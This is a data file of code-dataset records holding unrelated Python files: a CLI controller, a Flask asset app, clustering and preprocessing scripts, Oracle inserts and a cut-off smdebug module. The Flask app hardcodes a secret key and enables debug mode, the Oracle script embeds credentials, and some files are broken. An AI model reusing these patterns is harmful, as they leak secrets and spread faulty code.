"keras.preprocessing.sequence.pad_sequences", "line_number": 91, "usage_type": "call"}]}
+{"seq_id": "374142221", "text": "import sys\n\nfrom cement.core.foundation import CementApp\nfrom cement.ext.ext_colorlog import ColorLogHandler\nfrom cement.core.controller import CementBaseController, expose\nfrom fusion.src.core.builder import builder_factory\n\nclass FusionBaseController(CementBaseController):\n class Meta:\n label = 'base'\n description = \"Fusion CLI interacts with software integration & delivery pipeline\"\n\nclass InitController(CementBaseController):\n class Meta:\n label = 'init'\n description = \"Initialize Environment\"\n stacked_on = 'base'\n stacked_type = 'nested'\n arguments=[\n (['--type'], dict(help='Resource type', action='store', required=True)),\n (['--url'], dict(help='Resource URL', action='store', required=True)),\n (['--token'], dict(help='Access Token', action='store', required=True)),\n ]\n\n @expose(hide=True)\n def default(self):\n self.app.log.info(\"TODO: Prompt user for required configuration.\")\n pass\n\n @expose(help=\"Initialize builder\")\n def builder(self):\n type = self.app.pargs.type\n url = self.app.pargs.url\n token = self.app.pargs.token\n builder = builder_factory(type=type, app=self.app)\n builder.create(url=url, token=token)\n\n @expose(help=\"Initialize provisioner\")\n def provisioner(self):\n self.app.log.info(\"#TODO: Initialize provisioner\")\n\n @expose(help=\"Initialize code repository\")\n def code_repository(self):\n self.app.log.info(\"#TODO: Initialize code repository\")\n\n\nclass FusionApp(CementApp):\n class Meta:\n label = 'fusion'\n extensions = ['colorlog']\n log_handler = ColorLogHandler(colors={'DEBUG': '',\n 'INFO': 'green',\n 'WARNING': 'yellow',\n 'ERROR': 'red',\n 'CRITICAL': 'yellow,bg_red'})\n handlers = [FusionBaseController, InitController]", "sub_path": "fusion/src/cli/controller.py", "file_name": "controller.py", "file_ext": "py", "file_size_in_byte": 2059, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "cement.core.controller.CementBaseController", "line_number": 8, "usage_type": "name"}, {"api_name": "cement.core.controller.CementBaseController", "line_number": 13, "usage_type": "name"}, {"api_name": "cement.core.controller.expose", "line_number": 25, "usage_type": "call"}, {"api_name": "fusion.src.core.builder.builder_factory", "line_number": 35, "usage_type": "call"}, {"api_name": "cement.core.controller.expose", "line_number": 30, "usage_type": "call"}, {"api_name": "cement.core.controller.expose", "line_number": 38, "usage_type": "call"}, {"api_name": "cement.core.controller.expose", "line_number": 42, "usage_type": "call"}, {"api_name": "cement.core.foundation.CementApp", "line_number": 47, "usage_type": "name"}, {"api_name": "cement.ext.ext_colorlog.ColorLogHandler", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "577740398", "text": "# coding=utf-8\n\nfrom typing import Union\n\n\nclass Human(object):\n\tdef __init__(name, surname, sex=None, *args, **kwargs) -> None:\n\t\tsuper().__init__(name, surname, *args, **kwargs)\n\t\tself._name = name\n\t\tself._surname = _surname\n\t\tself._parents = []\n\t\tself._sex = sex\n\n\t@property\n\tdef parents(self) -> Union[Human]:\n\t\treturn self._parents\n\n\t@property\n\tdef name(self) -> str:\n\t\treturn self._name\n\n\t@property\t\n\tdef is_intact_family() -> bool: \n\t\tif len(self.parents) == 2:\n\t\t\treturn True\n\t\treturn False\n\n\t@property\t\n\tdef parent_names() -> Union[str]:\n\t\tnames = []\n\t\tfor parent in parents:\n\t\t\tnames.append(parent._name)\n\t\treturn names\n\n\n\ndef get_public_methods(type_):\n\t\"\"\"\n\tПолучение публичных аттрибутов\t\n\t\"\"\"\n\treturn [\n\t\tprint('{}.{}()'.format(type_.__name__, i)) # форматириуем строку\n\t\tfor i in dir(type_) if not i.startswith('__')\n\t]\n\n\nif __name__ == '__main__':\n\tif get_public_methods(int) == [] and \\\n\t\tget_public_methods(float) == []:\n\t\tprint('Impossible')\n", "sub_path": "python_examples/syntax_example.py", "file_name": "syntax_example.py", "file_ext": "py", "file_size_in_byte": 1008, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "typing.Union", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 29, "usage_type": "name"}]}
+{"seq_id": "325982696", "text": "import os\nfrom flask import Flask, render_template, url_for, request, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom forms import AddForm\n\napp = Flask(__name__)\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\napp.config['SECRET_KEY'] = 'My top secret'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'data.sqlite')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\nMigrate(app,db)\n\n\n\nclass Asset(db.Model):\n __tablename__= 'asset'\n id=db.Column(db.Integer, primary_key=True)\n type = db.Column(db.Text)\n serial_number = db.Column(db.Text)\n asset_number = db.Column(db.Text)\n BU = db.Column(db.Text)\n BL = db.Column(db.Text)\n cost = db.Column(db.Float)\n\n def __init__(self,type,serial_number,asset_number,BU,BL,cost):\n self.type=type\n self.serial_number=serial_number\n self.asset_number=asset_number\n self.BU=BU\n self.BL=BL\n self.cost=cost\n\n def __repr__(self):\n return f'Asset type: {self.type} Serial Number: {self.serial_number}'\n\n@app.route(\"/\")\ndef home():\n # return \"Hello, Flask!\"\n return render_template('index.html')\n\n# Add a new asset and commit to databse\n@app.route('/add', methods=['GET', 'POST'])\ndef add_asset():\n form=AddForm()\n # if form.is_valid():\n if form.validate_on_submit():\n type = form.type.data\n asset_number = form.asset_number.data\n serial_number = form.serial_number.data\n BU = form.BU.data\n BL = form.BL.data\n cost = form.cost.data\n new_asset = Asset(type,asset_number,serial_number,BL,BU,cost)\n db.session.add(new_asset)\n db.session.commit()\n return redirect(url_for('list_asset'))\n return render_template('add.html', form=form)\n\n\n@app.route('/list')\ndef list_asset():\n asset = Asset.query.all()\n return render_template('list_asset.html', asset=asset)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2010, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 14, "usage_type": "call"}, {"api_name": "flask_migrate.Migrate", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 43, "usage_type": "call"}, {"api_name": "forms.AddForm", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 67, "usage_type": "call"}]}
+{"seq_id": "312037878", "text": "import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom PIL import Image, ImageDraw, ImageFile\n\n\n\n\nimg = Image.open('euler.jpg')\n\n#img = img.resize()\n#print(img.size)\n\nsq_size = 100\n\nsq_pos = np.array([250, 100])\n\nmove_pos = 200 + sq_pos\n\nimg_np = np.asarray(img)\n\n#print(img_np.shape)\n\nsq_copy = img_np[sq_pos[0]:sq_pos[0]+sq_size, sq_pos[1]:sq_pos[1]+sq_size]\n\nsq_col = sq_copy.mean(axis=(0,1))\n\nprint(sq_copy.shape)\n\nimg_np.setflags(write=1)\nprint(img_np.flags)\n\nimg_np[move_pos[0]:move_pos[0]+sq_size, move_pos[1]:move_pos[1]+sq_size, :] = sq_copy\n\n\nimg = Image.fromarray(img_np)\n\nimg.show()\nexit()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#\n", "sub_path": "test_smear.py", "file_name": "test_smear.py", "file_ext": "py", "file_size_in_byte": 623, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "PIL.Image.open", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 9, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 20, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 36, "usage_type": "name"}]}
+{"seq_id": "159869232", "text": "import io\nimport json\n\nfrom chaoslib import Configuration, Secrets\n\nfrom chaosazure.machine.constants import RES_TYPE_VM\nfrom chaosazure.cli.runner import execute\nfrom chaosazure.cli.graph_query import filter_type_command\n\n\ndef pick_machines(configuration: Configuration, secrets: Secrets, filter: str):\n command = filter_type_command(RES_TYPE_VM, filter)\n result_json = __fetch_result(command, configuration, secrets)\n machines = __parse_result(result_json)\n\n return machines\n\n\n###############################################################################\n# Private helper functions\n###############################################################################\ndef __fetch_result(command, configuration, secrets):\n\n f = io.StringIO(\"\")\n execute(configuration, secrets, command, f)\n result_json = json.loads(f.getvalue())\n f.close()\n\n return result_json\n\n\ndef __parse_result(result_json):\n\n machines = []\n for elem in result_json:\n m = {\n 'name': elem['name'],\n 'resourceGroup': elem['resourceGroup']\n }\n machines.append(m)\n\n return machines\n", "sub_path": "chaosazure/machine/picker.py", "file_name": "picker.py", "file_ext": "py", "file_size_in_byte": 1125, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "chaoslib.Configuration", "line_number": 11, "usage_type": "name"}, {"api_name": "chaoslib.Secrets", "line_number": 11, "usage_type": "name"}, {"api_name": "chaosazure.cli.graph_query.filter_type_command", "line_number": 12, "usage_type": "call"}, {"api_name": "chaosazure.machine.constants.RES_TYPE_VM", "line_number": 12, "usage_type": "argument"}, {"api_name": "io.StringIO", "line_number": 24, "usage_type": "call"}, {"api_name": "chaosazure.cli.runner.execute", "line_number": 25, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 26, "usage_type": "call"}]}
+{"seq_id": "483373644", "text": "import sklearn.datasets as data\nfrom sklearn.cluster import KMeans\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport random as rd\n\n#USE GAUSSIAN MIXTURE MODEL\n\n\ndef makeData(n, std):\n X1 = data.make_blobs(n_samples=n, centers=1, n_features=3, cluster_std=std, center_box=(0, 0))\n df = pd.DataFrame(np.hstack([np.array(X1[0]), np.zeros(np.array(X1[0]).shape)]))\n df['labels'] = np.ones(n)\n X2 = data.make_blobs(n_samples=n, centers=1, n_features=3, cluster_std=std, center_box=(0, 0))\n dftmp = pd.DataFrame(np.hstack([np.zeros(np.array(X1[0]).shape), np.array(X2[0])]))\n dftmp['labels'] = np.ones(n)*2\n return df.append(dftmp, ignore_index=True)\n\ndef cluster_KMeans(df, k): #Hanterar dataframe\n\n labelsArray = []\n oldLabels = list(df['labels'])\n data = df.drop('labels', axis=1)\n data = data.values\n\n X = StandardScaler().fit_transform(data)\n print('Executing K-Means clustering on ' + str(len(data[:, 0])) + ' points.')\n print('Looking for k=' + str(k) + ' clusters.')\n print()\n\n # Clustering\n km = KMeans(n_clusters=k, random_state=0, init = 'k-means++').fit(X)\n labels = km.labels_\n n_clusters = len(set(labels))\n print(str(n_clusters) + \" clusters found.\")\n\n for i in range(0,len(km.labels_)):\n labelsArray.append('Cluster '+str(km.labels_[i] + 1))\n\n dfNew = pd.DataFrame(data=data)\n\n dfNew['labels']=labelsArray\n\n for i in range(0, n_clusters, 1):\n print('#Points in cluster ' + str(i+1) + ': ' + str(len(dfNew.loc[dfNew['labels'] == 'Cluster '+str(i+1)]))+'.')\n dfNew['oldLabels'] = oldLabels\n\n return dfNew\n\n\ndef getPCs(df, n_components):\n\n labels = list(df['labels'])\n data = df.drop('labels', axis=1)\n if 'oldLabels' in df.columns:\n oldLabels = list(df['oldLabels'])\n data = data.drop('oldLabels', axis=1)\n\n tmp = data.values\n standard = StandardScaler()\n tmpS = standard.fit_transform(tmp)\n data = pd.DataFrame(tmpS)\n\n pca = PCA(n_components=n_components)\n pca.fit(data)\n columns = ['PC %i' % i for i in range(1,n_components+1)]\n df_pca = pd.DataFrame(pca.transform(data), columns=columns, index=df.index)\n\n df_pca['labels'] = labels\n if 'oldLabels' in df.columns:\n df_pca['oldLabels'] = oldLabels\n\n return df_pca\n\n\ndf = makeData(100, 1)\ndf_cl = cluster_KMeans(df, 2)\ndf_pca = getPCs(df_cl, 2)\n\nplt.scatter(df_pca['PC 1'], df_pca['PC 2'])\n\nax1 = plt.subplot(1,2,1)\ndf_pca[df_pca['oldLabels']==1].plot.scatter(x='PC 1', y='PC 2', color='DarkGreen', marker='o', label='Cluster 1', ax = ax1)\ndf_pca[df_pca['oldLabels']==2].plot.scatter(x='PC 1', y='PC 2', color='blue', marker='>', label='Cluster 2', ax = ax1)\nplt.xlabel('PC 1', fontsize = 14)\nplt.ylabel('PC 2', fontsize = 14)\nplt.title('True data', fontsize = 14)\n\nax2 = plt.subplot(1,2,2)\ndf_pca[df_pca['labels']=='Cluster 1'].plot.scatter(x='PC 1', y='PC 2', color='DarkGreen', marker='o', label='Cluster 1', ax = ax2)\ndf_pca[df_pca['labels']=='Cluster 2'].plot.scatter(x='PC 1', y='PC 2', color='blue', marker='>', label='Cluster 2', ax = ax2)\nplt.xlabel('PC 1', fontsize = 14)\nplt.ylabel('PC 2', fontsize = 14)\nplt.title('K-Means clustering', fontsize = 14)\n\nplt.show()", "sub_path": "Main2.py", "file_name": "Main2.py", "file_ext": "py", "file_size_in_byte": 3306, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sklearn.datasets.make_blobs", "line_number": 14, 
"usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 14, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 16, "usage_type": "call"}, {"api_name": "sklearn.datasets.make_blobs", "line_number": 17, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 17, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 26, "usage_type": "name"}, {"api_name": "sklearn.datasets", "line_number": 27, "usage_type": "name"}, {"api_name": "sklearn.datasets.values", "line_number": 27, "usage_type": "attribute"}, {"api_name": "sklearn.datasets", "line_number": 29, "usage_type": "argument"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 30, "usage_type": "name"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 35, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 43, "usage_type": "name"}, {"api_name": "sklearn.datasets", "line_number": 57, "usage_type": "name"}, {"api_name": "sklearn.datasets", "line_number": 60, "usage_type": "name"}, {"api_name": "sklearn.datasets.drop", "line_number": 60, "usage_type": "call"}, {"api_name": "sklearn.datasets.values", "line_number": 62, "usage_type": "attribute"}, {"api_name": "sklearn.datasets", "line_number": 62, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 63, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 65, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 65, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 67, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 68, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 70, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 70, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
"line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}]}
+{"seq_id": "629707063", "text": "import pandas as pd\nimport os\nimport numpy as np\nfrom tqdm import tqdm\nfrom loader import check_sys_path\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport argparse\nimport re\n\nNOTES_COL = [\"allergy\", \"chief complaint\", \"history of present illness\", \"past medical history\", \"past procedure\",\n \"social history\", \"family history\", \"initial exam\", \"admission medications\", \"pertinent results\"]\nMEDICINE_COL = [\"metoprolol\", \"furosemide\", \"lisinopril\", \"amlodipine\", \"atenolol\", \"hydrochlorothiazide\", \"diltiazem\",\n \"carvedilol\"]\n\nparser = argparse.ArgumentParser(description='embedding model')\nparser.add_argument('--min_freq', default=10, type=int, help='learning rate') # wrong descriptions?\nparser.add_argument('--max_df', default=1, type=float, help='batch size') # wrong descriptions?\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n # read data\n df = pd.read_csv(os.path.join(check_sys_path(), \"discharge_notes_with_medication.csv\"))\n df = df[df[\"admission_notes\"].notna()]\n\n print(\"cleaning word...\")\n # discharge_notes = df[\"discharge_notes\"][train_idx].fillna(\"\").tolist()\n admission_notes = df[\"admission_notes\"].dropna().tolist()\n for i in range(len(admission_notes)):\n admission_notes[i] = re.sub(r\"\\d\\. \", \" ordernum \", admission_notes[i])\n admission_notes[i] = re.sub(r\"\\d\\d:\\d\\d\", \" hourtime \", admission_notes[i])\n admission_notes[i] = re.sub(r\"\\d+\", \" num \", admission_notes[i])\n admission_notes[i] = re.sub(\"_\", \" \", admission_notes[i])\n admission_notes[i] = re.sub(r\"\\. \", \" eos \", admission_notes[i])\n\n print(\"training nlp model...\")\n vectorizer = CountVectorizer(min_df=args.min_freq,\n stop_words=\"english\",\n max_df=args.max_df)\n vectorizer.fit(admission_notes)\n # vectorizer.fit(discharge_notes)\n\n word2idx = vectorizer.vocabulary_\n idx2word = [word for word, idx in word2idx.items()]\n vocab = word2idx.keys()\n # reserve 0 for padding value\n idx2word.append(idx2word[0])\n word2idx[idx2word[0]] = len(word2idx) + 1\n idx2word[0] = \" \"\n word2idx[\" \"] = 0\n\n freq_stop_words = vectorizer.stop_words_\n tokenizer = vectorizer.build_tokenizer()\n\n # transform word to idx\n print(\"transforming word to idx...\")\n # discharge_notes_idx = np.array([np.array([word2idx[token] for token in tokenizer(note) if token in vocab])\n # for note in tqdm(discharge_notes)])\n admission_notes_idx = np.array([np.array([word2idx[token] for token in tokenizer(note) if token in vocab])\n for note in admission_notes])\n\n notnan_indices = np.array([i for i, note in enumerate(admission_notes_idx) if note.shape[0] > 0])\n df = df.iloc[notnan_indices, :].reset_index()\n admission_notes_idx = admission_notes_idx[notnan_indices]\n\n # set random indexing for splitting training and validation data\n print(\"random splitting data into training and validation data set...\")\n random_idx = np.random.permutation(np.arange(admission_notes_idx.shape[0]))\n train_idx = random_idx[0:int(0.8 * len(random_idx))] # select first 80% as training data\n val_idx = random_idx[int(0.8 * len(random_idx)):int(0.9 * len(random_idx))] # random select 10% as validation data\n test_idx = random_idx[int(0.9 * len(random_idx)):-1] # random select 10% as test data\n\n # calculate relative freq for each label\n print(\"relative freq for each label in training data\")\n\n\n def stat(file, idx, label):\n file.write(label + \"\\n\")\n freq = df.iloc[idx, -8:].sum() / idx.shape[0]\n 
medicines = list(df.columns[-8:])\n for i, medicine in enumerate(medicines):\n f.write(\"%s:%.2f(%d)\\n\" % (medicine, freq[i], df.iloc[train_idx, -8 + i].sum()))\n f.write(\"total: %d\" % train_idx.shape[0])\n\n\n with open(\"data_stat.txt\", \"w\") as f:\n stat(f, train_idx, \"train\")\n stat(f, val_idx, \"val\")\n stat(f, test_idx, \"test\")\n\n # np.save(os.path.join(check_sys_path(), \"embedding_train_idx.npy\"), discharge_notes_idx)\n np.save(os.path.join(check_sys_path(), \"train_idx.npy\"), admission_notes_idx[train_idx])\n np.save(os.path.join(check_sys_path(), \"train_label.npy\"), np.array(df.loc[train_idx, MEDICINE_COL]))\n np.save(os.path.join(check_sys_path(), \"val_idx.npy\"), admission_notes_idx[val_idx])\n np.save(os.path.join(check_sys_path(), \"val_label.npy\"), np.array(df.loc[val_idx, MEDICINE_COL]))\n np.save(os.path.join(check_sys_path(), \"test_idx.npy\"), admission_notes_idx[test_idx])\n np.save(os.path.join(check_sys_path(), \"test_label.npy\"), np.array(df.loc[test_idx, MEDICINE_COL]))\n\n # save dict\n with open(os.path.join(check_sys_path(), \"word2idx.txt\"), \"w\") as f:\n f.write(\"\\n\".join([\"%s:%d\" % (word, idx) for word, idx in word2idx.items()]))\n with open(os.path.join(check_sys_path(), \"med2idx.txt\"), \"w\") as f:\n for idx, medicine in enumerate(MEDICINE_COL):\n f.write(\"%s:%s\\n\" % (medicine, idx))\n", "sub_path": "Baseline/preprocess.py", "file_name": "preprocess.py", "file_ext": "py", "file_size_in_byte": 5086, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "loader.check_sys_path", "line_number": 22, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 29, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 30, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 31, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 32, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "loader.check_sys_path", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "loader.check_sys_path", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 93, 
"usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "loader.check_sys_path", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "loader.check_sys_path", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "loader.check_sys_path", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "loader.check_sys_path", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "loader.check_sys_path", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "loader.check_sys_path", "line_number": 101, "usage_type": "call"}]}
+{"seq_id": "558764639", "text": "from __future__ import print_function\nimport cx_Oracle\n\ncon = cx_Oracle.connect('hr/hr@127.0.0.1/orcl')\n\n#\n# db=my.connect(host=\"localhost\",\n# user=\"saurabh\",\n# passwd=\"saurabh\",\n# db=\"test\"\n# )\n\nid=[1,2,3]\nname=['a','b','c']\nplace=['dewas','indore','ujjain']\n\nl=[{'price': ' 18000', 'heading': '1 BHK, Residential Apartment for rent in Kadubeesanahalli', 'super_buildup': '600 Sq.Ft. '}, {'price': ' 11000', 'heading': '1 Bedroom, Independent House/Villa for rent in Kaverappa Layout', 'super_buildup': '600 Sq.Ft. '}, {'price': ' 8500', 'heading': '1 BHK, Residential Apartment for rent in Kadubeesanahalli', 'super_buildup': '600 Sq.Ft. '}, {'price': ' 13000', 'heading': '1 Bedroom, Independent House/Villa for rent in Kadubeesanahalli', 'super_buildup': '1200 Sq.Ft. '}, {'price': ' 35000', 'heading': '2 BHK, Residential Apartment for rent in Kaverappa Layout', 'super_buildup': '1400 Sq.Ft. '}]\n\n\nlist=[]\nfor i in range(0,id.__len__()):\n list.append([id[i],name[i],place[i]])\n\nprint(list)\nprint(l.__len__())\n\n\n\n# # Connect mysql server\n# cursor = db.cursor()\n# sql = \"insert into test3(id,a,b)VALUES(%s,%s,%s)\"\n# number_of_rows = cursor.executemany(sql,list)\n# db.commit()\n#\n# db.close()\n\ncur = con.cursor()\ncur.bindarraysize = 7\ncur.setinputsizes(int, 20)\ncur.executemany(\"insert into test3(id,name,place) values (:1, :2,:3)\", list)\n\ncon.commit()\n\n# cur = con.cursor()\n# cur.bindarraysize = 7\n# cur.setinputsizes(int, 20)\n# for i in range(0,l.__len__()):\n# cur.execute(\"insert into test4(price,heading) values (l[i]['price'],l[i]['heading'])\", list)\n#\n# con.commit()\n\n# Now query the results back\n\n# cur2 = con.cursor()\n# cur2.execute('select * from test3')\n# res = cur2.fetchall()\n# print(res)\n#\n# cur.close()\n# cur2.close()\ncon.close()\n", "sub_path": "practice/database_con_read.py", "file_name": "database_con_read.py", "file_ext": "py", "file_size_in_byte": 1753, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "cx_Oracle.connect", "line_number": 4, "usage_type": "call"}]}
+{"seq_id": "339619873", "text": "# Third Party\nimport numpy as np\nimport torch\n\n# First Party\nfrom smdebug.core.reduction_config import ALLOWED_NORMS, ALLOWED_REDUCTIONS\nfrom smdebug.core.reductions import get_numpy_reduction\n\n\ndef get_reduction_of_data(reduction_name, tensor_data, tensor_name, abs=False):\n if isinstance(tensor_data, np.ndarray):\n return get_numpy_reduction(reduction_name, tensor_data, abs)\n if abs:\n tensor_data = torch.abs(tensor_data)\n\n if reduction_name in ALLOWED_REDUCTIONS:\n if reduction_name == \"variance\":\n reduction_name = \"var\"\n assert hasattr(torch.Tensor, reduction_name)\n f = getattr(torch.Tensor, reduction_name)\n op = f(tensor_data)\n return op\n elif reduction_name in ALLOWED_NORMS:\n if reduction_name in [\"l1\", \"l2\"]:\n ord = int(reduction_name[1])\n else:\n raise RuntimeError(\n \"Invalid normalization operation {0} for torch.Tensor\".format(reduction_name)\n )\n op = torch.norm(tensor_data, p=ord)\n return op\n elif hasattr(torch, reduction_name):\n f = getattr(torch, reduction_name)\n op = f(tensor_data)\n return op\n raise RuntimeError(\"Invalid reduction_name {0}\".format(reduction_name))\n\n\ndef make_numpy_array(x):\n if isinstance(x, np.ndarray):\n return x\n elif np.isscalar(x):\n return np.array([x])\n elif isinstance(x, torch.Tensor):\n return 